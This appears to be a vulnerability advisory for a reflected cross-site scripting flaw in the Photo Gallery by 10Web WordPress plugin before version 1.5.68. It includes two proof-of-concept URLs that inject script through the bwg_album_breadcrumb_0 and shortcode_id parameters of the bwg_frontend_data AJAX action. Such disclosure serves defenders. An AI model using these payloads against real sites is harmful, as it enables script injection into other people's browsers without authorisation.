WordPress Plugin Vulnerabilities
Photo Gallery by 10Web < 1.5.68 - Reflected Cross-Site Scripting (XSS)
Description
The plugin is vulnerable to Reflected Cross-Site Scripting (XSS) issues via the bwg_album_breadcrumb_0 and shortcode_id GET parameters passed to the bwg_frontend_data AJAX action
Proof of Concept
https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&bwg_album_breadcrumb_0=[{"id":"1'><img/src=x onerror=alert(1)>","page":1},{"id":"1","page":1}]&gallery_type=album_extended_preview
https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery_type=image_browser&gallery_id=1&tag=0&album_id=0&theme_id=1&shortcode_id=1%22%20onmouseover=alert(id)// Affects Plugins
No known fix
References
Classification
Miscellaneous
Timeline
Publicly Published
2021-02-03 (about 1 years ago)
Added
2021-02-04 (about 1 years ago)
Last Updated
2022-04-11 (about 2 months ago)